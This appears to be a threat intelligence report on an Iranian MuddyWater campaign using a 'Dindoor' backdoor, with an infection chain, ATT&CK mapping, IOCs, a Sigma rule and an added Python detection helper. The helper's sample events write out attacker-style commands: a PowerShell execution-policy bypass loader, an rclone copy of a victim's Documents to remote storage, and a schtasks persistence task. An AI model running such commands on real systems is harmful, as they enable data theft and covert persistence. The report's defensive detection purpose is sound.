Introduction
The Iranian threat group MuddyWater has been linked to a new cyber-espionage campaign targeting organizations across multiple strategic sectors.
The attackers deploy a previously undocumented backdoor called Dindoor, enabling persistent access, remote command execution, and stealthy data exfiltration.
This operation reflects the continued evolution of MuddyWater's tactics and its reliance on living-off-the-land techniques, legitimate tools, and cloud infrastructure to evade detection.
This report provides a threat intelligence analysis of the campaign, including:
- threat actor profile
- malware analysis
- MITRE ATT&CK mapping
- infrastructure overview
- indicators of compromise (IOC)
- SOC detection opportunities.
Threat Actor Overview
The activity has been attributed to the Iranian state-linked group MuddyWater.
Known aliases
- Seedworm
- Static Kitten
- TA450
- Mango Sandstorm
The group is widely believed to operate under the Iranian Ministry of Intelligence and Security (MOIS).
Strategic objectives
MuddyWater campaigns typically focus on:
- geopolitical intelligence gathering
- strategic surveillance
- monitoring government and defense organizations.
Targeted Sectors
The campaign targets organizations operating in sensitive industries.
| Sector | Motivation |
| --------------------------- | -------------------------------------- |
| Financial institutions | Economic intelligence |
| Aviation and transportation | Critical infrastructure reconnaissance |
| NGOs | Political monitoring |
| Technology companies | Intellectual property theft |
| Defense sector | Strategic intelligence |
Initial Access Vector
Threat actors likely gain initial access through spear-phishing campaigns or malicious document attachments.
After execution, the attackers deploy a PowerShell loader that downloads and executes the Dindoor backdoor.
Malware Analysis — Dindoor Backdoor
Dindoor functions as a persistent backdoor designed to provide attackers with full remote control over compromised systems.
Key capabilities
- remote command execution
- file exfiltration
- payload download
- system reconnaissance
- persistence mechanisms.
Infection chain
Phishing Email
↓
PowerShell Script
↓
Dindoor Backdoor
↓
Command & Control Server
↓
Data Exfiltration
Infrastructure Architecture
The campaign relies on a layered infrastructure designed to conceal the attackers' command-and-control servers.
Victim Machine
│
PowerShell Loader
│
Dindoor Backdoor
│
Encrypted HTTPS
│
Relay Server (VPS)
│
Command & Control Infrastructure
│
Cloud Storage Exfiltration
Attackers commonly use cloud storage platforms to exfiltrate stolen data, making detection significantly more difficult.
MITRE ATT&CK Mapping
This campaign aligns with multiple techniques defined in the MITRE ATT&CK framework.
| Tactic | Technique | ID |
| ----------------- | ---------------------------- | --------- |
| Initial Access | Spear-phishing Attachment | T1566.001 |
| Execution | PowerShell | T1059.001 |
| Persistence | Registry Run Keys | T1547.001 |
| Persistence | Scheduled Tasks | T1053 |
| Defense Evasion | Obfuscated Files | T1027 |
| Credential Access | Credential Dumping | T1003 |
| Discovery | System Information Discovery | T1082 |
| Lateral Movement | Remote Services | T1021 |
| Command & Control | Web Protocols | T1071.001 |
| Exfiltration | Exfiltration Over C2 | T1041 |
Indicators of Compromise (IOC)
Malware
Dindoor
Fakeset
Stagecomp
Darkcomp
Tools observed
rclone.exe
deno.exe
powershell.exe
cmd.exe
Malicious code-signing certificates
Amy Cherne
Donald Gay
Malware hashes (SHA256)
1a0827082d4b517b643c86ee678eaa53f85f1b33ad409a23c50164c3909fdaca
25b985ce5d7bf15015553e30927691e7673a68ad071693bf6d0284b069ca6d6a
eac8e7989c676b9a894ef366357f1cf8e285abde083fbdf92b3619f707ce292f
3916ba913e4d9a46cfce437b18735bbb5cc119cc97970946a1ac4eab6ab39230
Suspicious IP infrastructure
Cloud infrastructure used
*.wasabisys.com
SOC Detection Opportunities
Security teams should monitor for suspicious activity related to:
Suspicious process execution
deno.exe run
powershell.exe -ExecutionPolicy Bypass
rclone copy
Persistence mechanisms
schtasks /create
registry run keys
Network anomalies
Indicators include:
- repeated HTTPS traffic to unknown VPS infrastructure
- connections to newly registered domains
- unusual cloud storage connections.
Detection Rules
Detection rules can be implemented as Sigma rules (SigmaHQ) for log-based detection or as YARA rules for file and memory scanning.
Example Sigma rule
title: Suspicious Deno Runtime Execution
logsource:
product: windows
category: process_creation
detection:
selection:
Image|endswith: '\deno.exe'
condition: selection
level: mediumStrategic Assessment
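As an added example that is not part of the original report, the following Python helper applies the detection opportunities listed under "Suspicious process execution" and "Persistence mechanisms" (Deno execution, PowerShell execution-policy bypass, rclone copy, schtasks /create) to constructed Sysmon-style process-creation events. The rule set, field names and sample command lines are assumptions for illustration; the matcher only mimics Sigma's `endswith`/`contains` modifiers and is not the SigmaHQ engine.

```python
from dataclasses import dataclass

# Hypothetical minimal matcher mirroring Sigma's Image|endswith and
# CommandLine|contains modifiers; it is not the SigmaHQ engine.
@dataclass
class Rule:
    title: str
    level: str
    image_endswith: tuple      # any suffix may match (case-insensitive)
    cmd_contains: tuple = ()   # every token must appear in CommandLine

# Rules derived from the detection opportunities listed in the report.
RULES = [
    Rule("Suspicious Deno Runtime Execution", "medium", ("\\deno.exe",)),
    Rule("PowerShell Execution Policy Bypass", "medium",
         ("\\powershell.exe",), ("-executionpolicy bypass",)),
    Rule("Rclone Copy to Remote Storage", "high", ("\\rclone.exe",), ("copy",)),
    Rule("Scheduled Task Creation via schtasks", "medium",
         ("\\schtasks.exe",), ("/create",)),
]

def matches(rule: Rule, event: dict) -> bool:
    """True when the event's Image suffix and CommandLine tokens satisfy the rule."""
    image = event.get("Image", "").lower()
    cmd = event.get("CommandLine", "").lower()
    if not any(image.endswith(suffix.lower()) for suffix in rule.image_endswith):
        return False
    return all(token in cmd for token in rule.cmd_contains)

def evaluate(events: list) -> list:
    """Return (title, level, CommandLine) for every rule each event triggers."""
    return [(r.title, r.level, ev["CommandLine"])
            for ev in events for r in RULES if matches(r, ev)]

# Constructed sample events (Sysmon Event ID 1 style fields); not real telemetry.
SAMPLE_EVENTS = [
    {"Image": r"C:\Users\Public\deno.exe",
     "CommandLine": r"deno.exe run --allow-all C:\Users\Public\stage.ts"},
    {"Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": r"powershell.exe -ExecutionPolicy Bypass -File C:\Users\Public\loader.ps1"},
    {"Image": r"C:\ProgramData\rclone.exe",
     "CommandLine": r"rclone.exe copy C:\Users\victim\Documents remote:bucket/out"},
    {"Image": r"C:\Windows\System32\schtasks.exe",
     "CommandLine": r'schtasks.exe /create /sc minute /mo 15 /tn "Updater" /tr C:\Users\Public\loader.ps1'},
    {"Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell.exe -Command Get-Date"},   # benign: no bypass flag
]

if __name__ == "__main__":
    for title, level, cmd in evaluate(SAMPLE_EVENTS):
        print(f"[{level}] {title}: {cmd}")
```

The benign PowerShell event shows why the command-line condition matters: matching on the image alone would alert on every PowerShell launch.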
The campaign demonstrates the continued evolution of MuddyWater.
Threat actors increasingly rely on:
- legitimate system tools
- cloud infrastructure
- modular malware frameworks.
These techniques significantly complicate traditional detection methods and require organizations to adopt behavior-based monitoring and proactive threat hunting.
Conclusion
This campaign highlights the persistent threat posed by state-sponsored cyber espionage groups.
Organizations should implement advanced monitoring, endpoint detection, and threat intelligence capabilities to detect and mitigate such attacks.
As threat actors continue to refine their tradecraft, collaboration between security teams and the threat intelligence community remains essential to defending modern networks.
About the Author
Cyber Threat Intelligence Researcher focusing on:
- advanced persistent threats (APT)
- malware analysis
- cyber espionage operations
- threat hunting and SOC detection.